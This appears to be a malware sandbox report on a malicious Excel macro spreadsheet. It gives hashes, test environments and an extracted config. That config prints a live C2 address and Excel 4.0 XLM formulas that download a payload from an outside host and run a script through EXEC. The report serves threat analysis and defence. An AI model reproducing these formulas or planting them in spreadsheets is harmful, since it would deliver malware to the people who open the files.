0416059e645a8abea37f66cb85264b81 | Triage

Submit
Reports

Overview

overview

Static

static

0416059e64...1.xlsm

windows7-x64

0416059e64...1.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

0416059e645a8abea37f66cb85264b81.xlsm

Resource

win7-20231215-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

0416059e645a8abea37f66cb85264b81.xlsm

Resource

win10v2004-20231222-en

windows10-2004-x64

7 signatures

150 seconds

General

Target

0416059e645a8abea37f66cb85264b81
Size

6KB
MD5

0416059e645a8abea37f66cb85264b81
SHA1

e73b2be8acd90664b2f12edb1f36f16fd7691a1f
SHA256

a46f9fc708cf893db2b1095979fd32ec6974a5190e6f5b5dd8e3d1985994ed0d
SHA512

a3be89c351b6b7433922fdd8734edadb653248117de527c102ee227bed36b9860786478364bf9f0ac4368ff95a93f6822c602178627370b59addcb6859522af9
SSDEEP

192:NDScuSWbrA2OmmfRZ8UhHFBFYuHb98ynVCeQ+e4i:NvuPM2w71FYqb98yVZW

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

0416059e645a8abea37f66cb85264b81
.xlsm office2007

© 2018-2025

Terms | Privacy